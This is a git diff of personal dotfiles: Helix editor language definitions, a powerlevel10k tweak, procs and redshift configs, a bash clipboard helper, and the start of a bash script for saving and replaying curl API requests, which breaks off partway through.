source = { git = "https://github.com/JoranHonig/tree-sitter-solidity", rev = "f7f5251a3f5b1d04f0799b3571b12918af177fc8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "sql"
|
||||||
|
scope = "source.sql"
|
||||||
|
file-types = ["sql", "dsql"]
|
||||||
|
comment-token = "--"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
injection-regex = "sql"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "sql"
|
||||||
|
source = { git = "https://github.com/DerekStride/tree-sitter-sql", rev = "b9d109588d5b5ed986c857464830c2f0bef53f18" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "odin"
|
||||||
|
auto-format = true
|
||||||
|
scope = "source.odin"
|
||||||
|
file-types = ["odin"]
|
||||||
|
roots = ["ols.json", "main.odin"]
|
||||||
|
language-servers = [ "ols" ]
|
||||||
|
comment-token = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/" }
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
formatter = { command = "odinfmt", args = [ "-stdin" ] }
|
||||||
|
|
||||||
|
[language.debugger]
|
||||||
|
name = "lldb-dap"
|
||||||
|
transport = "stdio"
|
||||||
|
command = "lldb-dap"
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "binary"
|
||||||
|
request = "launch"
|
||||||
|
completion = [ { name = "binary", completion = "filename" } ]
|
||||||
|
args = { console = "internalConsole", program = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ "pid" ]
|
||||||
|
args = { console = "internalConsole", pid = "{0}" }
|
||||||
|
|
||||||
|
[[language.debugger.templates]]
|
||||||
|
name = "gdbserver attach"
|
||||||
|
request = "attach"
|
||||||
|
completion = [ { name = "lldb connect url", default = "connect://localhost:3333" }, { name = "file", completion = "filename" }, "pid" ]
|
||||||
|
args = { console = "internalConsole", attachCommands = [ "platform select remote-gdb-server", "platform connect {0}", "file {1}", "attach {2}" ] }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "odin"
|
||||||
|
source = { git = "https://github.com/tree-sitter-grammars/tree-sitter-odin", rev = "b5f668ef8918aab13812ce73acd89fe191fb8c5e" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "sshclientconfig"
|
||||||
|
scope = "source.sshclientconfig"
|
||||||
|
file-types = [{ glob = ".ssh/config" }, { glob = "/etc/ssh/ssh_config" }, { glob = "ssh_config.d/*.conf" } ]
|
||||||
|
comment-token = "#"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "sshclientconfig"
|
||||||
|
source = { git = "https://github.com/metio/tree-sitter-ssh-client-config", rev = "e45c6d5c71657344d4ecaf87dafae7736f776c57" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "elvish"
|
||||||
|
scope = "source.elvish"
|
||||||
|
shebangs = ["elvish"]
|
||||||
|
file-types = ["elv"]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
language-servers = [ "elvish" ]
|
||||||
|
grammar = "elvish"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "elvish"
|
||||||
|
source = { git = "https://github.com/ckafi/tree-sitter-elvish", rev = "e50787cadd3bc54f6d9c0704493a79078bb8a4e5" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "xml"
|
||||||
|
scope = "source.xml"
|
||||||
|
injection-regex = "xml"
|
||||||
|
file-types = [
|
||||||
|
"xml",
|
||||||
|
"mobileconfig",
|
||||||
|
"plist",
|
||||||
|
"xib",
|
||||||
|
"storyboard",
|
||||||
|
"svg",
|
||||||
|
"xsd",
|
||||||
|
"gml",
|
||||||
|
"xaml",
|
||||||
|
"gir",
|
||||||
|
"rss",
|
||||||
|
"atom",
|
||||||
|
"opml",
|
||||||
|
"policy",
|
||||||
|
"ascx",
|
||||||
|
"axml",
|
||||||
|
"axaml",
|
||||||
|
"bpmn",
|
||||||
|
"cpt",
|
||||||
|
"csl",
|
||||||
|
"csproj.user",
|
||||||
|
"dita",
|
||||||
|
"ditamap",
|
||||||
|
"dtml",
|
||||||
|
"fxml",
|
||||||
|
"iml",
|
||||||
|
"isml",
|
||||||
|
"jmx",
|
||||||
|
"launch",
|
||||||
|
"menu",
|
||||||
|
"mxml",
|
||||||
|
"nuspec",
|
||||||
|
"osc",
|
||||||
|
"osm",
|
||||||
|
"pt",
|
||||||
|
"publishsettings",
|
||||||
|
"pubxml",
|
||||||
|
"pubxml.user",
|
||||||
|
"rbxlx",
|
||||||
|
"rbxmx",
|
||||||
|
"rng",
|
||||||
|
"shproj",
|
||||||
|
"tld",
|
||||||
|
{ glob = "*.tm[Tt]heme" },
|
||||||
|
"tmx",
|
||||||
|
"vbproj.user",
|
||||||
|
"vcxproj",
|
||||||
|
"vcxproj.filters",
|
||||||
|
"wsdl",
|
||||||
|
"wxi",
|
||||||
|
"wxs",
|
||||||
|
"xbl",
|
||||||
|
"xlf",
|
||||||
|
"xliff",
|
||||||
|
"xpdl",
|
||||||
|
"xul",
|
||||||
|
"xoml",
|
||||||
|
"musicxml",
|
||||||
|
"glif",
|
||||||
|
"ui",
|
||||||
|
"sublime-snippet",
|
||||||
|
"xsl",
|
||||||
|
"mpd",
|
||||||
|
"smil"
|
||||||
|
]
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[language.auto-pairs]
|
||||||
|
'(' = ')'
|
||||||
|
'{' = '}'
|
||||||
|
'[' = ']'
|
||||||
|
'"' = '"'
|
||||||
|
"'" = "'"
|
||||||
|
"<" = ">"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "xml"
|
||||||
|
source = { git = "https://github.com/RenjiSann/tree-sitter-xml", rev = "48a7c2b6fb9d515577e115e6788937e837815651" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "env"
|
||||||
|
scope = "source.env"
|
||||||
|
file-types = [{ glob = ".env" }, { glob = ".env.*" }, { glob = ".envrc" }, { glob = ".envrc.*" }]
|
||||||
|
injection-regex = "env"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
grammar = "bash"
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "ini"
|
||||||
|
scope = "source.ini"
|
||||||
|
file-types = [
|
||||||
|
"ini",
|
||||||
|
# Systemd unit files
|
||||||
|
"service",
|
||||||
|
"automount",
|
||||||
|
"desktop",
|
||||||
|
"device",
|
||||||
|
"mount",
|
||||||
|
"nspawn",
|
||||||
|
"path",
|
||||||
|
"scope",
|
||||||
|
"slice",
|
||||||
|
"socket",
|
||||||
|
"swap",
|
||||||
|
"target",
|
||||||
|
"timer",
|
||||||
|
{ glob = "systemd/**/*.conf" },
|
||||||
|
# Podman quadlets
|
||||||
|
"container",
|
||||||
|
"volume",
|
||||||
|
"kube",
|
||||||
|
"network",
|
||||||
|
{ glob = ".editorconfig" },
|
||||||
|
{ glob = ".npmrc" },
|
||||||
|
{ glob = "hgrc" },
|
||||||
|
{ glob = "npmrc" },
|
||||||
|
{ glob = "rclone.conf" },
|
||||||
|
"properties",
|
||||||
|
"cfg",
|
||||||
|
"directory"
|
||||||
|
]
|
||||||
|
injection-regex = "ini"
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = "\t" }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "ini"
|
||||||
|
source = { git = "https://github.com/justinmk/tree-sitter-ini", rev = "32b31863f222bf22eb43b07d4e9be8017e36fb31" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "mermaid"
|
||||||
|
scope = "source.mermaid"
|
||||||
|
injection-regex = "mermaid"
|
||||||
|
file-types = ["mermaid", "mmd"]
|
||||||
|
comment-token = "%%"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "mermaid"
|
||||||
|
source = { git = "https://github.com/monaqa/tree-sitter-mermaid", rev = "d787c66276e7e95899230539f556e8b83ee16f6d" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "markdoc"
|
||||||
|
scope = "text.markdoc"
|
||||||
|
block-comment-tokens = { start = "<!--", end = "-->" }
|
||||||
|
file-types = ["mdoc"]
|
||||||
|
language-servers = [ "markdoc-ls" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "markdoc"
|
||||||
|
source = { git = "https://github.com/markdoc-extra/tree-sitter-markdoc", rev = "5ffe71b29e8a3f94823913ea9cea51fcfa7e3bf8" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "log"
|
||||||
|
scope = "source.log"
|
||||||
|
file-types = ["log"]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "log"
|
||||||
|
source = { git = "https://github.com/Tudyx/tree-sitter-log", rev = "62cfe307e942af3417171243b599cc7deac5eab9" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "powershell"
|
||||||
|
scope = "source.powershell"
|
||||||
|
injection-regex = "(pwsh|powershell)"
|
||||||
|
file-types = [ "ps1", "psm1", "psd1", "pscc", "psrc" ]
|
||||||
|
shebangs = [ "pwsh", "powershell" ]
|
||||||
|
comment-token = '#'
|
||||||
|
block-comment-tokens = { start = "<#", end = "#>" }
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "powershell"
|
||||||
|
source = { git = "https://github.com/airbus-cert/tree-sitter-powershell", rev = "c9316be0faca5d5b9fd3b57350de650755f42dc0" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "nginx"
|
||||||
|
scope = "source.nginx"
|
||||||
|
injection-regex = "nginx"
|
||||||
|
file-types = [
|
||||||
|
{ glob = "sites-available/*.conf" },
|
||||||
|
{ glob = "sites-enabled/*.conf" },
|
||||||
|
{ glob = "nginx.conf" },
|
||||||
|
{ glob = "conf.d/*.conf" }
|
||||||
|
]
|
||||||
|
roots = ["nginx.conf"]
|
||||||
|
comment-token = "#"
|
||||||
|
indent = { tab-width = 4, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "nginx"
|
||||||
|
source = { git = "https://gitlab.com/joncoole/tree-sitter-nginx", rev = "b4b61db443602b69410ab469c122c01b1e685aa0" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "ghostty"
|
||||||
|
scope = "source.ghostty"
|
||||||
|
file-types = [{ glob = "ghostty/config" }]
|
||||||
|
comment-tokens = "#"
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "ghostty"
|
||||||
|
source = { git = "https://github.com/bezhermoso/tree-sitter-ghostty" , rev = "8438a93b44367e962b2ea3a3b6511885bebd196a" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "csv"
|
||||||
|
file-types = ["csv"]
|
||||||
|
scope = "source.csv"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "csv"
|
||||||
|
source = { git = "https://github.com/weartist/rainbow-csv-tree-sitter", rev = "d3dbf916446131417e4c2ea9eb8591b23b466d27" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "yara"
|
||||||
|
scope = "source.yara"
|
||||||
|
file-types = ["yara", "yar"]
|
||||||
|
indent = { tab-width = 2, unit = " " }
|
||||||
|
comment-tokens = "//"
|
||||||
|
block-comment-tokens = { start = "/*", end = "*/"}
|
||||||
|
language-servers = [ "yls" ]
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "yara"
|
||||||
|
source = { git = "https://github.com/egibs/tree-sitter-yara", rev = "eb3ede203275c38000177f72ec0f9965312806ef" }
|
||||||
|
|
||||||
|
[[language]]
|
||||||
|
name = "debian"
|
||||||
|
scope = "text.debian"
|
||||||
|
file-types = [
|
||||||
|
"dsc",
|
||||||
|
"changes",
|
||||||
|
{ glob = "debian/**/control" },
|
||||||
|
{ glob = "etc/apt/sources.list.d/*.sources"}
|
||||||
|
]
|
||||||
|
comment-tokens = "#"
|
||||||
|
|
||||||
|
[[grammar]]
|
||||||
|
name = "debian"
|
||||||
|
source = { git = "https://gitlab.com/MggMuggins/tree-sitter-debian", rev = "9b3f4b78c45aab8a2f25a5f9e7bbc00995bc3dde" }
|
||||||
|
|
||||||
|
|
@ -548,7 +548,7 @@
|
||||||
|
|
||||||
###################[ command_execution_time: duration of the last command ]###################
|
###################[ command_execution_time: duration of the last command ]###################
|
||||||
# Show duration of the last command if takes at least this many seconds.
|
# Show duration of the last command if takes at least this many seconds.
|
||||||
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=3
|
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_THRESHOLD=1
|
||||||
# Show this many fractional digits. Zero means round to seconds.
|
# Show this many fractional digits. Zero means round to seconds.
|
||||||
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
|
typeset -g POWERLEVEL9K_COMMAND_EXECUTION_TIME_PRECISION=0
|
||||||
# Execution time color.
|
# Execution time color.
|
||||||
|
|
|
||||||
140
procs/.config/procs/config.toml
Normal file
140
procs/.config/procs/config.toml
Normal file
|
|
@ -0,0 +1,140 @@
|
||||||
|
[[columns]]
|
||||||
|
kind = "Pid"
|
||||||
|
style = "BrightYellow|Yellow"
|
||||||
|
numeric_search = true
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "User"
|
||||||
|
style = "BrightGreen|Green"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = true
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Separator"
|
||||||
|
style = "White|BrightBlack"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Tty"
|
||||||
|
style = "BrightWhite|Black"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "UsageCpu"
|
||||||
|
style = "ByPercentage"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "UsageMem"
|
||||||
|
style = "ByPercentage"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "CpuTime"
|
||||||
|
style = "BrightCyan|Cyan"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "MultiSlot"
|
||||||
|
style = "ByUnit"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Right"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Separator"
|
||||||
|
style = "White|BrightBlack"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = false
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[[columns]]
|
||||||
|
kind = "Command"
|
||||||
|
style = "BrightWhite|Black"
|
||||||
|
numeric_search = false
|
||||||
|
nonnumeric_search = true
|
||||||
|
align = "Left"
|
||||||
|
|
||||||
|
[style]
|
||||||
|
header = "BrightWhite|Black"
|
||||||
|
unit = "BrightWhite|Black"
|
||||||
|
tree = "BrightWhite|Black"
|
||||||
|
|
||||||
|
[style.by_percentage]
|
||||||
|
color_000 = "BrightBlue|Blue"
|
||||||
|
color_025 = "BrightGreen|Green"
|
||||||
|
color_050 = "BrightYellow|Yellow"
|
||||||
|
color_075 = "BrightRed|Red"
|
||||||
|
color_100 = "BrightRed|Red"
|
||||||
|
|
||||||
|
[style.by_state]
|
||||||
|
color_d = "BrightRed|Red"
|
||||||
|
color_r = "BrightGreen|Green"
|
||||||
|
color_s = "BrightBlue|Blue"
|
||||||
|
color_t = "BrightCyan|Cyan"
|
||||||
|
color_z = "BrightMagenta|Magenta"
|
||||||
|
color_x = "BrightMagenta|Magenta"
|
||||||
|
color_k = "BrightYellow|Yellow"
|
||||||
|
color_w = "BrightYellow|Yellow"
|
||||||
|
color_p = "BrightYellow|Yellow"
|
||||||
|
|
||||||
|
[style.by_unit]
|
||||||
|
color_k = "BrightBlue|Blue"
|
||||||
|
color_m = "BrightGreen|Green"
|
||||||
|
color_g = "BrightYellow|Yellow"
|
||||||
|
color_t = "BrightRed|Red"
|
||||||
|
color_p = "BrightRed|Red"
|
||||||
|
color_x = "BrightBlue|Blue"
|
||||||
|
|
||||||
|
[search]
|
||||||
|
numeric_search = "Exact"
|
||||||
|
nonnumeric_search = "Partial"
|
||||||
|
logic = "And"
|
||||||
|
case = "Smart"
|
||||||
|
|
||||||
|
[display]
|
||||||
|
show_self = false
|
||||||
|
show_self_parents = false
|
||||||
|
show_thread = false
|
||||||
|
show_thread_in_tree = true
|
||||||
|
show_parent_in_tree = true
|
||||||
|
show_children_in_tree = true
|
||||||
|
show_header = true
|
||||||
|
show_footer = false
|
||||||
|
cut_to_terminal = true
|
||||||
|
cut_to_pager = false
|
||||||
|
cut_to_pipe = false
|
||||||
|
color_mode = "Auto"
|
||||||
|
separator = "│"
|
||||||
|
ascending = "▲"
|
||||||
|
descending = "▼"
|
||||||
|
tree_symbols = ["│", "─", "┬", "├", "└"]
|
||||||
|
abbr_sid = true
|
||||||
|
theme = "Auto"
|
||||||
|
show_kthreads = true
|
||||||
|
|
||||||
|
[sort]
|
||||||
|
column = 0
|
||||||
|
order = "Ascending"
|
||||||
|
|
||||||
|
[docker]
|
||||||
|
path = "unix:///var/run/docker.sock"
|
||||||
|
|
||||||
|
[pager]
|
||||||
|
mode = "Auto"
|
||||||
|
detect_width = false
|
||||||
|
use_builtin = false
|
||||||
|
|
||||||
73
redshift/.config/redshift.conf
Normal file
73
redshift/.config/redshift.conf
Normal file
|
|
@ -0,0 +1,73 @@
|
||||||
|
; Global settings for redshift
|
||||||
|
[redshift]
|
||||||
|
; Set the day and night screen temperatures
|
||||||
|
temp-day=5700
|
||||||
|
temp-night=3200
|
||||||
|
|
||||||
|
; Disable the smooth fade between temperatures when Redshift starts and stops.
|
||||||
|
; 0 will cause an immediate change between screen temperatures.
|
||||||
|
; 1 will gradually apply the new screen temperature over a couple of seconds.
|
||||||
|
fade=1
|
||||||
|
|
||||||
|
; Solar elevation thresholds.
|
||||||
|
; By default, Redshift will use the current elevation of the sun to determine
|
||||||
|
; whether it is daytime, night or in transition (dawn/dusk). When the sun is
|
||||||
|
; above the degrees specified with elevation-high it is considered daytime and
|
||||||
|
; below elevation-low it is considered night.
|
||||||
|
;elevation-high=3
|
||||||
|
;elevation-low=-6
|
||||||
|
|
||||||
|
; Custom dawn/dusk intervals.
|
||||||
|
; Instead of using the solar elevation, the time intervals of dawn and dusk
|
||||||
|
; can be specified manually. The times must be specified as HH:MM in 24-hour
|
||||||
|
; format.
|
||||||
|
;dawn-time=6:00-7:45
|
||||||
|
;dusk-time=18:35-20:15
|
||||||
|
|
||||||
|
; Set the screen brightness. Default is 1.0.
|
||||||
|
;brightness=0.9
|
||||||
|
; It is also possible to use different settings for day and night
|
||||||
|
; since version 1.8.
|
||||||
|
;brightness-day=0.7
|
||||||
|
;brightness-night=0.4
|
||||||
|
; Set the screen gamma (for all colors, or each color channel
|
||||||
|
; individually)
|
||||||
|
gamma=0.8
|
||||||
|
;gamma=0.8:0.7:0.8
|
||||||
|
; This can also be set individually for day and night since
|
||||||
|
; version 1.10.
|
||||||
|
;gamma-day=0.8:0.7:0.8
|
||||||
|
;gamma-night=0.6
|
||||||
|
|
||||||
|
; Set the location-provider: 'geoclue2', 'manual'
|
||||||
|
; type 'redshift -l list' to see possible values.
|
||||||
|
; The location provider settings are in a different section.
|
||||||
|
location-provider=manual
|
||||||
|
|
||||||
|
; Set the adjustment-method: 'randr', 'vidmode'
|
||||||
|
; type 'redshift -m list' to see all possible values.
|
||||||
|
; 'randr' is the preferred method, 'vidmode' is an older API.
|
||||||
|
; but works in some cases when 'randr' does not.
|
||||||
|
; The adjustment method settings are in a different section.
|
||||||
|
# adjustment-method=randr
|
||||||
|
adjustment-method=vidmode
|
||||||
|
|
||||||
|
; Configuration of the location-provider:
|
||||||
|
; type 'redshift -l PROVIDER:help' to see the settings.
|
||||||
|
; ex: 'redshift -l manual:help'
|
||||||
|
; Keep in mind that longitudes west of Greenwich (e.g. the Americas)
|
||||||
|
; are negative numbers.
|
||||||
|
[manual]
|
||||||
|
lat=39.742043
|
||||||
|
lon=-104.991531
|
||||||
|
# lat=48.1
|
||||||
|
# lon=11.6
|
||||||
|
|
||||||
|
; Configuration of the adjustment-method
|
||||||
|
; type 'redshift -m METHOD:help' to see the settings.
|
||||||
|
; ex: 'redshift -m randr:help'
|
||||||
|
; In this example, randr is configured to adjust only screen 0.
|
||||||
|
; Note that the numbering starts from 0, so this is actually the first screen.
|
||||||
|
; If this option is not specified, Redshift will try to adjust _all_ screens.
|
||||||
|
[randr]
|
||||||
|
screen=0
|
||||||
31
scripts/.clipboard-helper
Normal file
31
scripts/.clipboard-helper
Normal file
|
|
@ -0,0 +1,31 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
# Clipboard helper functions for scripts
|
||||||
|
# Source this in scripts that need clipboard access
|
||||||
|
|
||||||
|
# Get clipboard content
|
||||||
|
# Get clipboard content.
# Prints the current clipboard to stdout using the first available tool.
# Probes X11 (xsel, xclip), Wayland (wl-paste from wl-clipboard), then
# macOS (pbpaste); returns 1 with a message on stderr if none is installed.
clip_get() {
    if command -v xsel &>/dev/null; then
        xsel --output --clipboard
    elif command -v xclip &>/dev/null; then
        xclip -selection clipboard -o
    elif command -v wl-paste &>/dev/null; then
        # Wayland sessions; --no-newline matches xsel/xclip output exactly.
        wl-paste --no-newline
    elif command -v pbpaste &>/dev/null; then
        pbpaste
    else
        echo "Error: No clipboard tool found (install xsel, xclip or wl-clipboard)" >&2
        return 1
    fi
}
|
||||||
|
|
||||||
|
# Set clipboard content
|
||||||
|
# Set clipboard content.
# Reads stdin and writes it to the clipboard using the first available tool.
# Probes X11 (xsel, xclip), Wayland (wl-copy from wl-clipboard), then
# macOS (pbcopy); returns 1 with a message on stderr if none is installed.
clip_set() {
    if command -v xsel &>/dev/null; then
        xsel --input --clipboard
    elif command -v xclip &>/dev/null; then
        xclip -selection clipboard
    elif command -v wl-copy &>/dev/null; then
        # Wayland sessions (wl-clipboard package); wl-copy reads stdin.
        wl-copy
    elif command -v pbcopy &>/dev/null; then
        pbcopy
    else
        echo "Error: No clipboard tool found (install xsel, xclip or wl-clipboard)" >&2
        return 1
    fi
}
|
||||||
443
scripts/api
Executable file
443
scripts/api
Executable file
|
|
@ -0,0 +1,443 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: api
# Description: API testing helper with saved requests and response management
# Usage: api save login "POST https://api.com/login" -d '{"user":"test"}'
#        api run login
#        api list
#        api history login

VERSION="1.0.0"
# Root of all persisted state: requests and responses are plain files,
# auth tokens live in one JSON object.
API_DIR="$HOME/.api"
REQUESTS_DIR="$API_DIR/requests"
RESPONSES_DIR="$API_DIR/responses"
TOKENS_FILE="$API_DIR/tokens.json"

# Colors (ANSI escapes, rendered via `echo -e`)
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly RED='\033[0;31m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Initialize API directory structure
|
||||||
|
# Create the on-disk layout (~/.api/{requests,responses}) and seed an
# empty JSON token store on first run. Safe to call repeatedly.
init_api() {
    mkdir -p "$REQUESTS_DIR" "$RESPONSES_DIR"
    [[ -f "$TOKENS_FILE" ]] || echo '{}' > "$TOKENS_FILE"
}
|
||||||
|
|
||||||
|
# Print the full usage/help text: commands, worked examples (including
# ${VAR} template substitution and token usage), and storage locations.
show_help() {
    echo -e "${BOLD}api${NC} - API Testing Helper v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  api <command> [args]"
    echo
    echo -e "${BOLD}COMMANDS:${NC}"
    echo -e "  ${CYAN}save NAME CURL_ARGS${NC}   Save HTTP request"
    echo -e "  ${CYAN}run NAME [VARS]${NC}       Run saved request"
    echo -e "  ${CYAN}list${NC}                  List saved requests"
    echo -e "  ${CYAN}show NAME${NC}             Show request details"
    echo -e "  ${CYAN}delete NAME${NC}           Delete saved request"
    echo -e "  ${CYAN}history NAME${NC}          Show response history"
    echo -e "  ${CYAN}diff NAME${NC}             Diff last two responses"
    echo -e "  ${CYAN}token set KEY VAL${NC}     Save auth token"
    echo -e "  ${CYAN}token get KEY${NC}         Get auth token"
    echo -e "  ${CYAN}export NAME curl${NC}      Export as curl command"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  # Save a login request"
    echo "  api save login \"POST https://api.example.com/login\" \\"
    echo "    -H \"Content-Type: application/json\" \\"
    echo "    -d '{\"user\":\"test\",\"pass\":\"\${PASSWORD}\"}'"
    echo
    echo "  # Run with variable substitution"
    echo "  api run login PASSWORD=secret123"
    echo
    echo "  # Save auth token from response"
    echo "  api token set AUTH_TOKEN \"Bearer abc123\""
    echo
    echo "  # Use token in request"
    echo "  api save profile \"GET https://api.example.com/profile\" \\"
    echo "    -H \"Authorization: \${AUTH_TOKEN}\""
    echo
    echo -e "${BOLD}FEATURES:${NC}"
    echo "  - Variable substitution (\${VAR})"
    echo "  - Response history"
    echo "  - Pretty-print JSON"
    echo "  - Diff responses"
    echo "  - Token management"
    echo
    echo -e "${BOLD}NOTES:${NC}"
    echo "  Requests: $REQUESTS_DIR"
    echo "  Responses: $RESPONSES_DIR"
    echo "  Tokens: $TOKENS_FILE"
}
|
||||||
|
|
||||||
|
# Save request
|
||||||
|
# Save a curl invocation as an executable request script under $REQUESTS_DIR.
#
# Fixes over the naive version:
#   - Arguments are serialized individually, single-quoted, so headers and
#     JSON bodies containing spaces/quotes survive the round trip. Single
#     quotes (not printf %q) are used so literal ${VAR} placeholders stay
#     textually intact for run_request's template substitution.
#   - The documented "METHOD URL" first argument is translated to explicit
#     `-X METHOD URL` curl flags (previously it was word-split and curl
#     treated the bare method name as a URL).
#
# Arguments: $1 = request name; rest = curl arguments.
save_request() {
    local name=$1
    shift
    local request_file="$REQUESTS_DIR/$name.sh"

    local -a req=("$@")
    if [[ ${req[0]:-} =~ ^(GET|POST|PUT|DELETE|PATCH|HEAD|OPTIONS)\ +(.+)$ ]]; then
        req=(-X "${BASH_REMATCH[1]}" "${BASH_REMATCH[2]}" "${req[@]:1}")
    fi

    # Shell-quote each argument: wrap in '...', escaping embedded quotes.
    local arg serialized=""
    for arg in "${req[@]}"; do
        serialized+=" '${arg//\'/\'\\\'\'}'"
    done

    cat > "$request_file" << EOF
#!/usr/bin/env bash
# API Request: $name
# Saved: $(date)

curl -w "\\n\\nStatus: %{http_code}\\nTime: %{time_total}s\\n" \\
  $serialized
EOF

    chmod +x "$request_file"
    echo -e "${GREEN}✓${NC} Saved request: $name"
    echo -e "${CYAN}File:${NC} $request_file"
}
|
||||||
|
|
||||||
|
# Run saved request
|
||||||
|
# Execute a saved request by name.
#
# Template substitution: literal ${KEY} occurrences in the saved script are
# replaced textually — first from KEY=VALUE command-line arguments, then from
# the persistent token store (requires jq). The substituted script is piped
# through bash; raw output is tee'd to a timestamped file in $RESPONSES_DIR
# and pretty-printed with jq when the first line parses as JSON.
run_request() {
    local name=$1
    shift
    local request_file="$REQUESTS_DIR/$name.sh"

    if [[ ! -f "$request_file" ]]; then
        echo -e "${RED}Error:${NC} Request not found: $name" >&2
        echo "Use 'api list' to see available requests" >&2
        exit 1
    fi

    # Collect KEY=VALUE overrides from the command line.
    declare -A overrides
    local arg
    for arg in "$@"; do
        if [[ "$arg" =~ ^([A-Z_]+)=(.+)$ ]]; then
            overrides[${BASH_REMATCH[1]}]="${BASH_REMATCH[2]}"
        fi
    done

    local body
    body=$(cat "$request_file")

    # Command-line variables win (applied first)...
    local key
    for key in "${!overrides[@]}"; do
        body="${body//\$\{$key\}/${overrides[$key]}}"
    done

    # ...then values from the token store.
    if command -v jq &>/dev/null && [[ -f "$TOKENS_FILE" ]]; then
        local entry val
        while IFS= read -r entry; do
            key=$(echo "$entry" | jq -r '.key')
            val=$(echo "$entry" | jq -r '.value')
            body="${body//\$\{$key\}/$val}"
        done < <(jq -c 'to_entries[]' "$TOKENS_FILE")
    fi

    local stamp response_file
    stamp=$(date '+%Y%m%d-%H%M%S')
    response_file="$RESPONSES_DIR/${name}_${stamp}.txt"

    echo -e "${BOLD}${CYAN}Running: $name${NC}"
    echo

    # Run the substituted script, mirroring output to the response file.
    bash <<<"$body" | tee "$response_file"

    echo
    echo -e "${GREEN}✓${NC} Response saved: $response_file"

    # Pretty-print when the body looks like JSON; the last 3 lines are the
    # Status:/Time: trailer appended by the saved curl's -w format.
    if command -v jq &>/dev/null; then
        if head -1 "$response_file" | jq empty 2>/dev/null; then
            echo
